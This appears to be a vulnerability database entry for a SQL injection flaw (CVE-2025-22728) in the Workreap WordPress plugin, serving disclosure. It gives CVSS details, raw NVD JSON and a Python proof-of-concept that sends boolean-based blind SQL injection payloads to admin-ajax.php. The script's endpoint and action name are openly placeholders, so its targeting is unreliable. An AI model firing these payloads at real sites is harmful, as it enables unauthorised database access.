Security Vulnerability Report
中文
CVE-2025-22728 CVSS 8.5 HIGH

CVE-2025-22728

Published: 2026-01-08 10:15:48
Last Modified: 2026-04-27 19:16:13

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in AmentoTech Workreap (theme's plugin) workreap allows SQL Injection.This issue affects Workreap (theme's plugin): from n/a through <= 3.3.6.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Workreap WordPress主题插件 <= 3.3.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-22728 Workreap SQL Injection PoC # Target: WordPress site with Workreap plugin <= 3.3.6 def test_sqli(url, param_name='search_term'): """ Test for SQL injection vulnerability in Workreap plugin """ # Blind SQL injection test - check if response varies with boolean condition true_payload = f"test' AND 1=1 -- -" false_payload = f"test' AND 1=2 -- -" # Time-based blind SQL injection payload time_payload = "test' AND (SELECT * FROM (SELECT SLEEP(5))a) -- -" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } print(f"[*] Testing target: {url}") # Test 1: Boolean-based blind SQLi print("[*] Testing boolean-based blind SQL injection...") try: # Replace with actual vulnerable endpoint target = f"{url}/wp-admin/admin-ajax.php" params = { 'action': 'workreap_ajax_search', # Example action name param_name: true_payload } resp1 = requests.get(target, params=params, headers=headers, timeout=10) params[param_name] = false_payload resp2 = requests.get(target, params=params, headers=headers, timeout=10) if len(resp1.text) != len(resp2.text): print("[+] Boolean-based SQL injection detected!") return True except Exception as e: print(f"[-] Error during testing: {e}") return False if __name__ == '__main__': if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") sys.exit(1) target_url = sys.argv[1] test_sqli(target_url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-22728", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:48.390", "lastModified": "2026-04-27T19:16:12.507", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in AmentoTech Workreap (theme's plugin) workreap allows SQL Injection.This issue affects Workreap (theme's plugin): from n/a through <= 3.3.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/workreap/vulnerability/wordpress-workreap-theme-s-plugin-plugin-3-3-6-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}